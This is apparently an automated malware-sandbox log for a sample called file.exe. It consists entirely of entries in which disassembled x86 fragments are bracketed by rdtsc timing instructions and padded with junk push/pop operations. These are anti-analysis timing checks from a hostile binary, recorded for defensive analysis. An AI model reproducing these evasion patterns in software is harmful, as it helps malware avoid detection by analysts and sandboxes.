          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 346847 second address: 346853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 346853 second address: 346857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34DCBD second address: 34DCC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34BE22 second address: 34BE28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34FD7C second address: 34FD8C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34EEB0 second address: 34EECF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34DEA9 second address: 34DF59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebp 0x0000000a call 00007F65B529F4B8h 0x0000000f pop ebp 0x00000010 mov dword ptr [esp+04h], ebp 0x00000014 add dword ptr [esp+04h], 0000001Bh 0x0000001c inc ebp 0x0000001d push ebp 0x0000001e ret 0x0000001f pop ebp 0x00000020 ret 0x00000021 mov bx, A071h 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr [ebp+122D2365h], ecx 0x00000032 call 00007F65B529F4C3h 0x00000037 push edi 0x00000038 mov dword ptr [ebp+122D30DCh], eax 0x0000003e pop ebx 0x0000003f pop edi 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 stc 0x00000048 mov eax, dword ptr [ebp+122D048Dh] 0x0000004e push 00000000h 0x00000050 push esi 0x00000051 call 00007F65B529F4B8h 0x00000056 pop esi 0x00000057 mov dword ptr [esp+04h], esi 0x0000005b add dword ptr [esp+04h], 0000001Dh 0x00000063 inc esi 0x00000064 push esi 0x00000065 ret 0x00000066 pop esi 0x00000067 ret 0x00000068 mov bh, EBh 0x0000006a mov dword ptr [ebp+122D1CA9h], edx 0x00000070 push FFFFFFFFh 0x00000072 nop 0x00000073 pushad 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F65B529F4C8h 0x0000007b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34FD8C second address: 34FD97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34DF59 second address: 34DF6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F65B529F4BCh 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 34DF6D second address: 34DF87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F65B4EE8BD0h 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3524BA second address: 3524BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35891D second address: 358932 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F65B4EE8BCAh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 358AC2 second address: 358AC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 358AC6 second address: 358ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35D16F second address: 35D175 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35D175 second address: 35D17B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35D17B second address: 35D1AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F65B529F4C8h 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 35D42F second address: 35D462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e jmp 00007F65B4EE8BCDh 0x00000013 push eax 0x00000014 push edx 0x00000015 jl 00007F65B4EE8BC6h 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F4639 second address: 2F463D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F463D second address: 2F4643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F4643 second address: 2F4649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2F4649 second address: 2F464E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3627A8 second address: 3627C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jg 00007F65B529F4B6h 0x0000000c jmp 00007F65B529F4C4h 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 362D46 second address: 362D85 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jnp 00007F65B4EE8BC8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007F65B4EE8BF4h 0x00000016 jl 00007F65B4EE8BD2h 0x0000001c jmp 00007F65B4EE8BCCh 0x00000021 push edx 0x00000022 jmp 00007F65B4EE8BD4h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 363083 second address: 36308D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F65B529F4B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36308D second address: 3630AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F65B4EE8BCCh 0x0000000d je 00007F65B4EE8BC6h 0x00000013 push esi 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop edi 0x00000018 pop esi 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push esi 0x0000001d pop esi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36321D second address: 363222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3634E9 second address: 3634F9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65B4EE8BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36390C second address: 363914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 363914 second address: 36391A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36391A second address: 36391E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36391E second address: 363942 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jl 00007F65B4EE8BC6h 0x00000012 jl 00007F65B4EE8BC6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 363942 second address: 363946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 369748 second address: 36975B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B4EE8BCFh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36DC89 second address: 36DC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36DC98 second address: 36DCA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F65B4EE8BC6h 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334478 second address: 33447D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 33447D second address: 334487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F65B4EE8BC6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334487 second address: 3344C7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ecx, ebx 0x0000000d lea eax, dword ptr [ebp+124791F7h] 0x00000013 clc 0x00000014 nop 0x00000015 jl 00007F65B529F4BEh 0x0000001b push ecx 0x0000001c jno 00007F65B529F4B6h 0x00000022 pop ecx 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F65B529F4C8h 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3344C7 second address: 3344CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3344CD second address: 31EECD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F65B529F4BCh 0x00000008 jno 00007F65B529F4B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F65B529F4B8h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b jmp 00007F65B529F4C3h 0x00000030 call dword ptr [ebp+1244CD3Bh] 0x00000036 pushad 0x00000037 push ecx 0x00000038 jmp 00007F65B529F4BFh 0x0000003d push esi 0x0000003e pop esi 0x0000003f pop ecx 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F65B529F4C2h 0x00000047 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334A94 second address: 334AC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a js 00007F65B4EE8BC6h 0x00000010 pop eax 0x00000011 popad 0x00000012 xor dword ptr [esp], 6275BFD3h 0x00000019 push C9B16305h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334AC1 second address: 334AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334AC5 second address: 334AD7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F65B4EE8BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F65B4EE8BCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334BBB second address: 334BFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], esi 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F65B529F4B8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000014h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 jno 00007F65B529F4B9h 0x0000002a nop 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F65B529F4C2h 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334BFF second address: 334C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F65B4EE8BCCh 0x00000014 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334C1A second address: 334C24 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334CBF second address: 334CC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334CC5 second address: 334CD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 334CD3 second address: 334D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push esi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop esi 0x00000009 popad 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e pushad 0x0000000f pushad 0x00000010 jng 00007F65B4EE8BC6h 0x00000016 jmp 00007F65B4EE8BD6h 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 335422 second address: 335434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B529F4BAh 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3355BC second address: 335607 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnl 00007F65B4EE8BDDh 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 pushad 0x00000015 jmp 00007F65B4EE8BCEh 0x0000001a js 00007F65B4EE8BCCh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 335607 second address: 335616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3356A8 second address: 3356AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3356AC second address: 3356FE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F65B529F4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007F65B529F4C3h 0x00000011 nop 0x00000012 cmc 0x00000013 mov di, 8CDEh 0x00000017 lea eax, dword ptr [ebp+1247923Bh] 0x0000001d push 00000000h 0x0000001f push edx 0x00000020 call 00007F65B529F4B8h 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], edx 0x0000002a add dword ptr [esp+04h], 00000016h 0x00000032 inc edx 0x00000033 push edx 0x00000034 ret 0x00000035 pop edx 0x00000036 ret 0x00000037 movzx ecx, dx 0x0000003a push eax 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3356FE second address: 31F9AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d lea eax, dword ptr [ebp+124791F7h] 0x00000013 and edi, dword ptr [ebp+122D2B8Dh] 0x00000019 push eax 0x0000001a pushad 0x0000001b jmp 00007F65B4EE8BD5h 0x00000020 jmp 00007F65B4EE8BCEh 0x00000025 popad 0x00000026 mov dword ptr [esp], eax 0x00000029 mov dword ptr [ebp+122D30F0h], ecx 0x0000002f call dword ptr [ebp+122D1DD3h] 0x00000035 pushad 0x00000036 jg 00007F65B4EE8BCEh 0x0000003c push eax 0x0000003d push edx 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31F9AA second address: 31F9AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36CED7 second address: 36CEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36CEDD second address: 36CEE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D2F2 second address: 36D2F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D2F6 second address: 36D312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D312 second address: 36D322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F65B4EE8BC6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D484 second address: 36D493 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jo 00007F65B529F4B6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D493 second address: 36D49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D49B second address: 36D4A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D4A7 second address: 36D4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D4AD second address: 36D4C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 jbe 00007F65B529F4B6h 0x0000000e jnc 00007F65B529F4B6h 0x00000014 pop ebx 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D4C2 second address: 36D4C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D4C9 second address: 36D4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D4D2 second address: 36D4D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D4D8 second address: 36D4DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D61E second address: 36D62B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F65B4EE8BCCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 31F9A2 second address: 31F9AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 36D7B6 second address: 36D7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 373399 second address: 3733A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F65B529F4B6h 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 37215F second address: 372163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372163 second address: 372169 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3722F6 second address: 3722FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3722FB second address: 372326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F65B529F4B6h 0x0000000a jng 00007F65B529F4B6h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 pop ecx 0x00000019 jmp 00007F65B529F4C2h 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372493 second address: 372497 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 372782 second address: 37278D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 3728CE second address: 3728DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 379A20 second address: 379A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jmp 00007F65B529F4C0h 0x0000000a pop ebx 0x0000000b popad 0x0000000c jc 00007F65B529F4E7h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F65B529F4C1h 0x00000019 rdtsc
